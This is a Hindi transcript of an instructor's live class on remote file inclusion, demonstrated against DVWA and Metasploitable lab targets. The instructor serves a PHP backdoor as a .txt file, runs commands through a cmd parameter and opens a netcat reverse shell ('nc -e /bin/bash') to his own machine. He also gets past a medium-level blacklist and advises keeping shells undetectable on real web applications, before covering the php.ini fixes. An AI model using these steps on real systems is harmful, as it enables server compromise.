ठीक है। तो रिमोट फाइल इंक्लूजन क्या है उसके लिए जस्ट वेट करो। मैं यहाँ पे फाइल इंक्लूजन वहाँ पे मैं फाइल इंक्लूजन का एक पीडीएफ खोल लेता हूँ। तो यहाँ पे लोकल फाइल इंक्लूजन और रिमोट फाइल इंक्लूजन मैंने दोनों मर्ज कर दिए। ठीक है, क्योंकि ये दोनों फाइल इंक्लूजन कैटेगरी की वल्नरेबिलिटी है। तो इधर से तुम लोग देख सकते हो दोनों को एक बार में ही। ठीक है। तो यहाँ पे आज हम लोग देखने वाले हैं, हमने कल कर लिया था लोकल फाइल इंक्लूजन, ठीक है, जिसको हम एलएफआई भी बोलते हैं। तो यहाँ पे मैंने वही बता दिया है जो सारी चीज़ें थी। मैंने एलएफआई के बारे में यहाँ पे इंट्रोडक्शन दे दिया गया। पहले एक ब्रीफ इंट्रोडक्शन दिया है, देन उसको पॉइंट्स में कवर कर दिया है एक बेटर वे में। ठीक है। एंड यहाँ पे ऑल ओवर चीज़ें बता रखी, फाइल फॉर कोड इंजेक्शन, जैसे कि कल हमने इस वाली फाइल पे देखा था प्रॉक सेल्फ इन्वायरन। ठीक है। तो आप इसकी जगह पे कह सकते हो और भी ऐसी फाइल्स होती हैं जहाँ पे तुम लोग इंजेक्ट कर सकते हो कोड वगैरह को, जैसे कि ऑथेंटिकेशन की फाइल्स। तो ऑथेंटिकेशन फाइल्स को चेक कर सकते हो और उसमें चेक कर सकते हो कि कौन सा काइंड ऑफ ऑथेंटिकेशन वहाँ पे जा रहा है। ठीक है। और उस ऑथेंटिकेशन करते टाइम वहाँ पे अपना कोड को इंजेक्ट कर देना है तुम लोगों को। ठीक है, बस ये करना है। एंड अगर हम यहाँ पे आए रिमोट फाइल इंक्लूजन पे, जो कि आरएफआई। ओके। सो आज हम लोग देखेंगे कि ये रिमोट फाइल इंक्लूजन वल्नरेबिलिटी क्या है। ओके। सो remote file inclusion is an attack targeting vulnerabilities in web application that dynamically reference external script. The preparator goal is to exploit the referencing function in an application to upload malware, example backdoor and shells, from a remote URL located within a different domain. सो आई नो कि आप लोगों को ये जो यहाँ पे थ्योरेटिकल पार्ट कवर दिया है, ये आप लोगों को उतना समझ नहीं आया होगा। ओके। यहाँ पे मैंने इसको कुछ छोटे छोटे पॉइंट्स में बांट दिए हैं जो आपको इसको समझने में हेल्प करेंगे, इजी वे में हेल्प करेंगे आपको समझने के लिए। ओके। तो अगर यहाँ पे मैं इसका तो मतलब बता ही दूंगा, बट आप लोग इसको भी पढ़ के देख सकते हो। ठीक है, कि ये सिमिलर टू लोकल फाइल इंक्लूजन है, बट ये अलाउ करता है अटैकर को रीड एनी फाइल। एनी फाइल यानी कोई भी फाइल रीड कर सकता है किसी भी सर्वर से, फ्रॉम एनी सर्वर। दैट मीन्स किसी भी सर्वर से कोई भी फाइल एक्सेस कर सकता है, ये रीड कर सकता है। ठीक है। एग्जीक्यूट पीएचपी फाइल फ्रॉम अदर सर्वर्स ऑन द करेंट सर्वर्स। दैट मीन्स कि हम अपना जो प्रेजेंट सर्वर चल रहा है इसमें हम लोग पीएचपी के बैकडोर्स को एग्जीक्यूट करा सकते हैं विद द हेल्प ऑफ कोई अनदर सर्वर। ठीक है। अब वो कैसे होगा वो भी हम देखेंगे। ठीक है। स्टोर पीएचपी फाइल ऑन अदर सर्वर एज टीएक्सटी, यानी हमको एज अ टीएक्सटी यहाँ पे हमको सेव करके रखना है हमारी जो भी बैकडोर की फाइल होगी। ओके। तो यहाँ पे आगे जो ये माइग्रेटिंग है कि लाइक इसको कैसे माइग्रेट करना है। ठीक है। यहाँ पे पहले में बता रखा है रिमोट फाइल इंक्लूजन और दूसरे में बता रखा है लोकल फाइल इंक्लूजन। ठीक है। तो हम इसके आगे हम देखेंगे इसको कैसे करना है। जैसे कि यहाँ पे हमारा लैब ओपन हो चुका है, तो लैब को ओपन कर लेता हूँ मैं यहाँ पे जस्ट। नो इंटरनेट के बर्ब स्वीट। जस्ट वेट करते हैं। ओके। नाउ हमको इसको मिनिमाइज कर देना है एंड इसको वापस से रीलोड करना है। तो अब यहाँ पे हमारे पास खुल गया है। ओके। तो अभी हम क्या कर सकते हैं कि यहाँ पे कह सकते हो कि अब हम क्या करेंगे। अब हम लोग डीवीडब्ल्यू पे जाएंगे या मेटल डे पे, दोनों पे हम लोग ट्राई करेंगे। ठीक है।
क्या बात है, लॉगिन नहीं हो रहा। हम्म, तो यहाँ पे हम लो कर देते हैं और यहाँ पे फाइल इंक्लूजन पे जाते हैं। ठीक है, तो अब हमने लोकल फाइल इंक्लूजन में क्या देखा था कि यहाँ से हम लोग इसी सर्वर में जो फाइल है उनको रीड कर सकते हैं। ठीक है, तो अब यहाँ पे हमको ऐसा नहीं करना है। अब हमको क्या करना है कि हमको किसी और सर्वर पे हमारी जो फाइल है उसको स्टोर कराना है और उसकी यूआरएल हमको यहाँ पे लाके देनी है। ठीक है, अगर मैं इसको एक थियोरेटिकल वे में समझाऊं, तो मैं इसको यहाँ पे ब्लैक कलर दे देता हूँ पहले, ब्लैक बैकग्राउंड पे। तो अब हम करेंगे क्या, कल हमने देखा था कि अगर कहीं पे क्वेश्चन मार्क, ठीक है, पी पी, ठीक है, सॉरी डॉट पी था, डॉट पी क्वेश्चन मार्क और फाइल पैरामीटर आ गया, कुछ भी पैरामीटर आ गया, फाइल इक्वल्स टू। तो अब ये तो हमारा पहला सर्वर था। ठीक है, ये वाला जो था ये हमारा पहला सर्वर था। ओके, हम्म, अब हमको यहाँ पे इसके आगे हम उसी लोकल सर्वर से फाइल उठा रहे थे, यानी जिस पे वो वेबसाइट रन कर रही थी, तो हम क्या कर रहे थे, उसी से कह सकते हो लोकल फाइल को ही उठा रहे थे, उसी के लोकल सर्वर से उठा रहे थे फाइल्स को, इसलिए वो लोकल कह सकते हो, लोकल फाइल इंक्लूजन नाम है। अब इसका रिमोट फाइल क्यों है, क्योंकि किसी हम रिमोट कह सकते हो या किसी अनदर सर्वर से उठाएंगे। तो अनदर सर्वर यानी जैसे कि एच टी टी पी स्लैश स्लैश EX, तो लोगों को मेरी वॉइस आ रही है? हाँ चलो फिर से काम करके EXAMPLE एग्जाम्पल, ठीक है, स्लैश और यहाँ पे पेलोड डॉट TXT, ठीक है, पेलोड डॉट TXT। ज्ञानित जोगी, ये कौन है? ज्ञानित जोगी कौन हो? बताओ यार, कमाल है। ठीक है, तो हमको अब करना क्या है कि जैसे कि हमारा जो फाइल था, ठीक है, हमको करना क्या है कि हमने कल देखा था कि अगर यहाँ पे हम कोई रिमोट सर्वर दे दें, जैसे कि अगर हम लाइनेक्स का ही सर्वर ओपन कर लें एक, ठीक है, अब या तो पाइथन का सर्वर ओपन कर लो या कोई भी या अपाचे का सर्वर ओपन कर लो, ठीक है, वो तुम पे डिपेंड करता है, काम दोनों करते हैं। ठीक है, तो यहाँ पे कोई भी सर्वर ओपन कर लो, ठीक है, जैसे कि अगर मैं पाइथन ही ओपन कर लूँ, पाइथन, ओके, स्पाइडी बिन्स, ठीक है, तो अगर मैं यहाँ लाइनेक्स पे जाता हूँ, python-m http सर्वर 8080, ओके, अरे ऑलरेडी इन यूज्ड, ओके, 8080 ऑलरेडी इन यूज्ड है। ठीक है, तो हम क्या क्या 4455 कर लेते हैं, बट उससे पहले हमको यहाँ पे हमारा पेलोड बनाना पड़ेगा। ठीक है, सो पेलोड बनाने के लिए अगर हम सपोज करो इन केस हम मैं CD शेल में चला जाता हूँ और यहाँ पे मेरे पास मल्टीपल शेल्स हैं, जैसे कि एक 404 है, अगर मैं इसको कैट 404.php कर दूँ, तो ये देखो, ये एक शेल बना रखा है, कैट 4004 PHP, तो एक ये शेल बना रखा है, ये फायरवॉल को बाईपास करने के लिए मैंने बनाया था।
देन एक backdoor डॉट php एट, ये देखो वही जो हमने नॉर्मल। तो ठीक है, अब हम यहाँ पे इसको रीनेम कर देते हैं, ठीक है। और सो mv txt ls, तो backdoor डॉट txt यहाँ पे काम आ रहा है, ठीक है। तो पाइथन 4455, ओके, हिट एंटर। तो अब यहाँ पे हमारा 4455 पे पोर्ट चल रहा है। अब इसको कह सकते हो कि अगर आपको देखना है कि सक्सेसफुली चल रहा है कि नहीं, तो यहाँ पे आपको अपनी काली मशीन की आईपी डाल देनी है, 192 और 29.51, और यहाँ पे दे देना है 4455 नॉट सिक्योर, एस को हटा दो। अब चलाओ, तो यहाँ पे देखो ये डायरेक्टरी आ रही है HTTP के साथ चलाना, तो ये देखो सारी चीज़ दिख रही है, ओके। तो अब हम इसको भी एक्सेस कर सकते हैं, ये देखो ये रहा। तो अगर हम इसको कॉपी करते हैं एंड इसको हमने कॉपी कर लिया, अब देख लिया। अब हम जाते हैं अपने इसमें, हमारे मशीन, और अब हम मशीन पे क्या करते हैं, इसको यहाँ पे पेस्ट करते हैं। और अगर हम मैं एंटर करता हूँ और इसका जो कंटेंट है वो हमारे कहीं यहाँ लोकल पेज पे दिखता है, ये वेबसाइट, तो समझ लो तुमने रिमोट फाइल इंक्लूजन वल्नरेबिलिटी फाइंड कर ली। एंटर किया तो यहाँ पे कुछ बता रहा है, इंक्लूड फंक्शन डॉट इंक्लूड एक्सेस डिसेबल इन सर्वर कॉन्फ़िगरेशन। ये क्या है? ओके, सो इसमें हमको एक कॉन्फ़िगरेशन करनी पड़ेगी, ठीक है। जैसे कि मैंने यहाँ पे मेंशन कर रखा था यूआरएल पे, कि अगर यहाँ पे ये अलाउ यूआरएल एफ ओपन और अलाउ यूआरएल इंक्लूड, ये दोनों अगर कह सकते हो चीज़ें इनेबल है, तब रिमोट फाइल इंक्लूजन होगी, ठीक है। तो इसको मैं सी डी सी जी आई, नहीं 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 नहीं, सी डी स्लैश एल एस वार, PHP इन्फो नहीं, टिकी टेस्ट, ओके ठीक है। यहाँ पे भी वो फाइल नहीं है, तो कहाँ गई फाइल वो? ठीक है, तो आई गेस सिक्योरिटी टॉमकैट नहीं, अपडेट मैनेजर PHP 5 में ही तो थी। हम्म, तो अब यहाँ पे हमको वो फाइल चीज़ ढूंढनी है, तो यहाँ पे कंट्रोल एफ नहीं, कंट्रोल एफ यहाँ पे नहीं है, वेर इज कंट्रोल W, ठीक है। अलाउ यूआरएल इस पे नहीं है,
include file. ओके, सो जस्ट 2 मिनट वेट करो। ठीक है, डायरेक्टरीज की हम्म, चलो ठीक है, कंट्रोल एक्स। तो कहाँ पे होगी? हम्म, ओके, 1 मिनट। cd/etc/php5। ठीक है, लेस, हाँ, यहाँ पे है cd/cgi लेस php डॉट, हाँ मिल गई फाइल। ओके, सो नैनो php डॉट ini कंट्रोल w अलाउ अंडरस्कोर url। हाँ, अलाउ यूआरएल इंक्लूड, इसको ये ऑफ है तो इसको ऑन कर देना है। ठीक है, ऑन, एंड कंट्रोल ओ, हिट एंटर, कंट्रोल एक्स, क्लियर। ठीक है, अब तुम्हारा लैब रेडी है। तो इस डायरेक्टरी पे आके वो फाइल को एडिट कर देना, और जस्ट अलाउ यूआरएल को ओपन करके एंड जस्ट वापस से रिफ्रेश करो। तो यहाँ पे देखो, कह सकते हो ये कुछ यहाँ पे देखने को नहीं मिला, दैट मीन्स कि यहाँ पे कोई एरर नहीं आया। अब ये हम इसको एग्जीक्यूट करा सकते हैं ऐसा। अगर हम यहाँ पे इसके आगे क्वेश्चन मार्क CMD लगा दें और इक्वल्स टू LS कर दें, तो यहाँ पे ये काम नहीं कर रहा ऐसे। ओके, तो यहाँ पे चलो हम लोग रिवर्सल लेने का एक वो बना देते हैं, PWD एंड लगा देते हैं इधर एक बार। हाँ, अब देखो, टेक्स्ट फॉर्मेट में एंड लगा दोगे। अगर TXT फाइल है तो यहाँ पे एंड लगा दो, एंड जस्ट CMD लगा दो और PWD। अब वापस हम लोग LS कर देते हैं, यहाँ पे IF कॉन्फ़िग कर देते हैं। IF कॉन्फ़िग नहीं आया, IPADDR कर देते हैं, IPADDR। तो यहाँ पे IPADDR आ गया। ठीक है, ARP-A नहीं, काम करो। तो अब यहाँ पे हम लोग दैट मीन्स कि हम लोग देख सकते हैं। और अगर मैं इसका UNAME-A करूँ तो ये देखो, लाइनक्स मेटास्प्लॉइटेबल, यानी हम लोग मेटास्प्लॉइटेबल को सर्वर को कंट्रोल कर रहे हैं। अब यहाँ पे हमने सक्सेसफुली रिमोट फाइल इंक्लूजन तो फाइंड कर लिए। अब हमें करना क्या है कि अब इससे हमको रिवर्सल लेना है। ठीक है, रिवर्सल कैसे लेंगे? चलो, बेसिक्स है, नॉर्मल सा वही जो हम लोग पहले कमांड यूज कर रहे थे, वही कमांड हम लोग यूज करेंगे नेट कैट के थ्रू। nc-e/bin/bash 0.168.29.51 और 4445, इसको हम लोग यूज करते हैं एंड जस्ट कॉपी करते हैं, यहाँ पे लाके पेस्ट कर देते हैं। बट उससे पहले हम लोग पोर्टल भी खोल लेते हैं। 445 पे मैंने नहीं खोला क्योंकि ये यहाँ पे ओपन हो रहा है। और यहाँ पे देखो, आपके जितने भी कमांड यहाँ पे टाइप करेंगे यहाँ पे एग्जीक्यूट हो रहे हैं, और हमको मालूम चल रहा है कि यहाँ पे एग्जीक्यूट किया जा रहा है। ठीक है, तो हम एक और शेल खोल, अपना टर्मिनल खोल लेते हैं। 45 एंड हिट एंटर।
एंटर किया। अब हम जाते हैं अपने मशीन पे, देखते हैं क्या हमारे पास रिवर्स शेल आया कि नहीं आया। ओके, कहाँ गया टर्मिनल। ओके, तो आप यहाँ पे देख सकते हो सक्सेसफुली हमने यहाँ पे रिवर्स शेल ले लिया है। ओके, तो नाउ अब हम टारगेट सर्वर को कॉम्प्रोमाइज कर दिया है। तो अब यहाँ पे हम लोग कह सकते हो कि इसको कंट्रोल कर सकते हैं। यहाँ पे देख सकते हो, ठीक है, pwd यू नेम -a, ये देखो लाइनक्स में एक्सप्लॉइटेबल। ठीक है, अगर यू नेम करूंगा तो ओनली लाइनक्स आएगा। ठीक है, तो हमने यहाँ पे सक्सेसफुली कंप्लीट कर दिया। ओके, तो मैं कंट्रोल सी करता हूँ। तो वापस से अगर हम जाके देखें, ओके, इसको हम हटा देते हैं, कट कर लेते हैं, एंटर कर देते हैं। ठीक है, अब हम क्या करते हैं कि यहाँ पे हम इस पूरे यूआरएल को कॉपी कर रहे थे। अब बैक जाते हैं एक बार, या इस पूरे यूआरएल को हटा ही देते हैं। ठीक है, यहाँ पे एरर आ रहा है, आई नो, क्योंकि यहाँ पे खाली दे रखा है इसलिए। डीवीडब्ल्यू सेटिंग्स मीडियम करते हैं। अब एक बार वापस से ट्राई करते हैं, पेस्ट एंड यहाँ पे नॉर्मल। पहले हम देखते हैं क्या नॉर्मल ये एग्जीक्यूट हो रहा है कि नहीं। यहाँ पे कह सकते हो इंक्लूड 192 क्लोज बैक डोर, दैट मीन्स कि यहाँ पे ओपन नहीं करने दे रहा है। ठीक है, यानी सर्वर ने इसको डिटेक्ट कर लिया। बट अब यहाँ पे आप लोग सोचो कि क्या डिटेक्ट कर रहा होगा, क्या यहाँ पे ब्लैकलिस्ट होगा, बताओ, गेस करो आप लोग। कुछ तो होगा ही, आप में से कोई बताना चाहेगा? चित्रा, स्पाइडी, सुब्रमण्यम, विशाल। No, no, no doubt. तो यहाँ पे अगर हम इसका, अगर तुम हेल्प लेना चाहो तो व्यू सोर्स कर सकते हो, और यहाँ पे तुमको देखने को मिलेगा कि यहाँ पे बैड इनपुट वैलिडेशन दे रखा है, यानी कि HTTP और HTTPS को इन लोगों ने ब्लैकलिस्ट कर रखा है। यानी HTTP अगर ऐसे में लिखा होगा तो काम नहीं करेगा। तो अगर हम इसमें एक कैपिटल और या अगर हम परसेंटेज समथिंग %09 लगा दें, ठीक है, %09, तो भी काम नहीं किया। तो अब क्या करें? हम्म अब हमारे पास बचा है कि हम अपर केस लोअर केस को मिक्स कर दें। अगर हम यहाँ पे जैसे कि HTTP लिख रखा है, तो H को कैपिटल, T को कैपिटल और एक T छोटा, और P ऐसे, अगर ऐसे लिख दें, एंटर करें, तो भी काम नहीं किया। अगर हम दोनों T को कैपिटल कर दें, हम्म, तो भी काम नहीं किया। यानी यहाँ पे कह सकते हो कि अगर हम वापस से भी सोच करें तो यहाँ पे इसको बैन कर रखा है। तो अगर हम इसको हटा दें और सीधा ये खोलें तो भी ये नहीं खुल रहा है। एंड लगा के वो पेस्ट कर दें और लगाने का ट्राई करें तो भी नहीं काम करेगा। अगर LS भी करें तो भी काम नहीं कर रहा। उसके लिए सबसे पहले हमको यहाँ पे देखना पड़ेगा HTTP। URL में इनकोड कर दें अगर इसको, कॉपी, ठीक है, एंड यहाँ पे लाके पेस्ट कर दो। यहाँ पे हमको मिल गया। अगर हम कॉपी करें एंड यहाँ पे लाके पेस्ट कर दें और अब एंटर करें तो भी कुछ काम नहीं आया अभी। हम्म तो यहाँ पे और क्या कर सकते हैं? हम्म
चलो यहाँ पे काम नहीं कर रहा, तो हम एक बार अपाचे का सर्वर बना के क्रिएट करके देखते हैं। ठीक है, सर्विस अपाचे टू स्टार्ट। ठीक है, cd shells ls, और यहाँ पे backdoor.txt जो है इसको हम अपलोड कर देते हैं। सो cp backdoor.txt /var/www/html। तो यहाँ पे देखो आ गया बैकडोर ये। ठीक है, backdoor.txt। सो अगर अब नॉर्मल आईपी भी खोलेंगे हमारे सिस्टम की 229.51, तो भी यहाँ पे देखो खुल जा रही है। ठीक है। हम्म, तो अब यहाँ पे क्या कर सकते हैं कि यहाँ पे हम लोग नॉर्मल इसके स्लैश आगे बैक टीएक्सटी कर दें, तो ये देखो हमारा बैकडोर भी खुल गया। तो अगर हम इसको कॉपी करें और यहाँ पे लाके पेस्ट कर दें, एंटर कर दें, तो नहीं। अब अगर इसको हम देखें HTTP, तो देखो अपाचे का खुल गया। तो यहाँ पे एक और क्या ब्लैक लिस्टेड था, ये सेमी कॉलन जो एक्स्ट्रा लगा रखा हो, या समथिंग क्वेश्चन मार्क या एंड जो लगा रखा था हमने यहाँ पे, या जो पोर्ट मेंशन कर रखा था, तो पोर्ट वहाँ पे कह सकते हो कि ब्लैक लिस्टेड था। तो ट्राई करना किसी पाइथन का सर्वर एक बार ना बना के एक बार नॉर्मल अपाचे का भी बना लेना। ठीक है, जिसमें बाय डिफॉल्ट पोर्ट 80 ही हो। तो अब यहाँ पे हो गया। अगर हम अब यहाँ पे कंट्रोल जेड और एंड cmd इक्वल्स टू ls, तो देखो काम करने लग गया वापस। तो हमने मीडियम लेवल की सिक्योरिटी सेटिंग्स को बाईपास कर दिया। हम्म, और यहाँ पे अभी हम कर देखें, अगर यहाँ पे हम nc-e bin bash फिर पोर्ट हम लोग क्या 4455 ले लें, बट उससे पहले हमको इसकी ये जो पाइथन का सर्वर है इसको बंद करना पड़ेगा। ठीक है, 5 पे आ गया। अब अगर हम यहाँ पे एंटर करते हैं और देखते हैं कि क्या हमारे पास रिवर्स कनेक्शन रिसीव होता है या नहीं, तो ओके। तो अब यहाँ पे हम वापस जाके देखते हैं, आई गेस हो ही गया होगा। नहीं। ये देखो। ठीक है, तो यहाँ पे कनेक्शन हमको आ गया है, वह देख सकते हो कनेक्टेड टू। ठीक है, तो अब यहाँ पे हम लोग ls करते हैं, pwd करते हैं, uname -a क्या करते हैं। ठीक है, ओ सॉरी, क्लियर। तो हमारे पास रिवर्स कनेक्शन आ गया था। अभी अगर हम ट्राई करें कि क्या हम हाई लेवल की सिक्योरिटी सेटिंग्स को बाईपास कर सकते हैं कि नहीं। ठीक है, सो हाई लेवल की सिक्योरिटी सेटिंग्स को बाईपास करने के लिए उसके लिए पहले आप व्यूज पेज सोर्स कर लें, और यहाँ पे आप लोग देख लें कि यहाँ पे बता रखा है कि अगर include.php फाइल हट गई, ठीक है, यानी ओनली include.php फाइल को अलाउ कर रहा है। ठीक है, हमको मालूम है कि ओनली include.php फाइल एक्सेस रह सकती है। तो अगर हम यहाँ पे पेस्ट करें, बट backdoor.txt की जगह पे हम लोग include.php कर दें, एरर फाइल नॉट फाउंड, यानी यहाँ पे फाइल तो हम लोग एक्सेस कर पा रहे हैं हाई सेटिंग्स में भी। अगर हम यहाँ पे बैकडोर डॉट टी एक्स टी कर दें, अरे सॉरी txt बैकडोर डॉट txt, एरर फाइल नॉट फाउंड। अरे स्पेलिंग ही गलत है। बैक ओके, बैकडोर डॉट txt कर दिया, फिर भी नहीं मिला।
तो अब यहाँ पे हमको मिल रहा है देखने को कि यहाँ पे ओनली ये जो अलाउ कर रहा है ये सिर्फ इंक्लूड डॉट पी फाइल को अलाउ कर रहा है, ठीक है। और ये यहाँ पे चेक कर रहा है कि हाँ बस यही फाइल एक्सेस होनी चाहिए जो शुरुआत से कह सकते हो आई है। तो यहाँ पे कह सकते हो कि ये वाली सेटिंग्स तो बाईपास नहीं हो सकती है। हम्म, आप लोग ट्राई कर सकते हो अपना लाइक क्रिएटिविटी यूज़ कर सकते हो, ठीक है, इसको बाईपास करने के लिए। ओके, सो यहाँ पे हमने कह सकते हो रिमोट फाइल इंक्लूजन ऑल ओवर टॉपिक्स कवर कर लिए। अगर आप कह सकते हो नहीं खुल लिए तो आप लोग वहाँ पे यूआरएल को इनकोड करके दे सकते हो, ठीक है। यूआरएल इनकोडिंग में जो आप कुछ वर्ड्स रहते हैं जैसे कि एचटीटीपी, ठीक है, वो सारी चीज़ें तो आप लोग उसको वो करके दे सकते हो। और कई बार जो फायर आपके जो वो होते हैं ये शेल वो भी डिटेक्ट हो जाते हैं। सो इसलिए आप लोग ट्राई करना कि जो आपका शेल हो वो भी थोड़ा एफयूडी हो या कुछ ऐसा ना हो जो डिटेक्टेबल हो, ठीक है। क्योंकि कई बार ऐसा होता है लाइक शेल के ज़रिए भी यहाँ पे डिटेक्ट हो जाता है रियल लाइफ वेब एप्लीकेशंस पे। तो यहाँ पे कह सकते हो प्रॉब्लम की बात होती है उस शेल के कारण फॉरवर्डन आ जाएगा। बट यहाँ पे कह सकते हो कि एक नॉर्मल सा कोड ही लिखोगे तो ज़्यादा बेटर रहेगा। वहाँ पे आप लोगों को उतना हाई वाला कोड नहीं लिखना है जो आप उसको डिटेक्ट करवा दे, और टीएक्सटी पे रखना है अपने फाइल को, ठीक है, हमेशा ये याद रखना। पेज पे रखोगे तो तुरंत डिटेक्ट हो जाएगा, ठीक है। रिमोट फाइल इंक्लूजन पे ये रहता है। ओके, सो अभी यहाँ पे हम लोग बात कर लेते हैं इसको फिक्स कैसे करेंगे। तो सबसे पहले हम लोग बात करते हैं रिमोट फाइल इंक्लूजन। तो जैसा कि हमने देखा था कि अलाउ यूआरएल एफ ओपन जो था वो ऑन था, और अलाउ यूआरएल इंक्लूड वो भी हमने ऑन कर दिया था। जो कि अगर हम यहाँ पे जाएं तो अगर हम वापस से नैनो पी एच पी इनिक, ठीक है, कंट्रोल डब्ल्यू अलाउ यूआरएल, तो यहाँ पे देखो कह सकते हो कि अलाउ यूआरएल एफ ओपन यहाँ पे ये दिख रहा है ऑन है, अलाउ यूआरएल इंक्लूड ऑन है, ठीक है। तो अब आप इसको ऑफ कर दो, ठीक है, इसको ऑफ कर दोगे तो काम हो जाएगा, ठीक है। और ये कह सकते हो कि यहाँ पे इस वाली यूआरएल को भी कह सकते हो, और जो यहाँ पे अलाउ यूआरएल एफ ओपन है तो इसको भी ऑफ करना है और इसको भी ऑफ करना है, ठीक है। ये यहाँ पे जो ऑन है इसको भी ऑन है क्योंकि ये एच टी टी पी और एफ टी पी को अलाउ करता है, कह सकते हो कि सर्वर्स पे फाइल को इनको एग्जीक्यूट करा सको, ठीक है। तो इसलिए इन वाली फाइल्स को हम लोगों को ये जो फाइल है इस पे ये एडिट करनी रहती है इसको सेफ बनाने के लिए। फिर बात करते हैं कि यहाँ पे जो हमारा लोकल फाइल इंक्लूजन है वो कैसे यहाँ पे कह सकते हो कि वो प्रोटेक्ट होगा। यहाँ पे ले रखा है यूज स्टैटिक फाइल इंक्लूजन। सो स्टैटिक फाइल इंक्लूजन क्या है बेसिकली, ठीक है। तो अब आप लोगों को स्टैटिक फाइल इंक्लूजन जानने के लिए सबसे पहले आप लोगों को ये जानना पड़ेगा कि एक्चुअल में स्टैटिक होता क्या है, ठीक है। तो ओके, सो यहाँ पे देखो बेसिकली स्टैटिक फाइल इंक्लूजन और ये यहाँ पे स्टैटिक का मतलब समझते हैं। आप लोगों ने ये तो देखा ही होगा स्टैटिक और डायनेमिक, ठीक है। तो डायनेमिक क्या है और स्टैटिक क्या है वो आप लोगों को अगर मालूम है तो यहाँ पे आप लोग समझना थोड़ा ट्राई कर सकते हैं, ठीक है। तो यहाँ पे क्या होगा बेसिकली डायनेमिक जो चेंज होता रहे, स्टैटिक जो एक ही रहे, ठीक है। तो जैसे कि यहाँ पे हमने अभी हाई लेवल की सिक्योरिटी सेटिंग्स में देखा वहाँ पे इंक्लूड डॉट पी को एक्सेस कर पा रहे, तो वो यहाँ पे स्टैटिक फाइल इंक्लूजन यहाँ पे एक्सेस करने के लिए बोला था कि आप एक ही फाइल को एक्सेस कर सकते हो, ठीक है, और कोई फाइल पे एक्सेस करने जाओगे तो एरर आ जाएगा। बस ये बैक एंड पे कोड डाल दो, काम हो जाएगा, आपका लोकल फाइल इंक्लूजन से बच जाएगा, ठीक है। स्टैटिक और डायनेमिक का समझ लिया, देन उसके बाद फाइल इंक्लूजन को उसी में इम्प्लीमेंट कर दिया, ठीक है। स्टैटिक मीन्स जो एक ही हो और डायनेमिक मीन्स जो कह सकते हो कि दूसरे को एक्सेस कर सकते हो या मल्टीपल चीज, ठीक है। अब वो स्टैटिक और डायनेमिक किस पे यूज, किस सेंटेंस में यूज कर रहे हो उस पे भी डिपेंड होता है आपका। ओके, सो
यहाँ पे किसी को कोई प्रॉब्लम आए रिमोट फाइल इंक्लूजन पे तो पूछ सकता है, वो कुछ भी उसको प्रॉब्लम आई, कुछ समझ ना आया तो।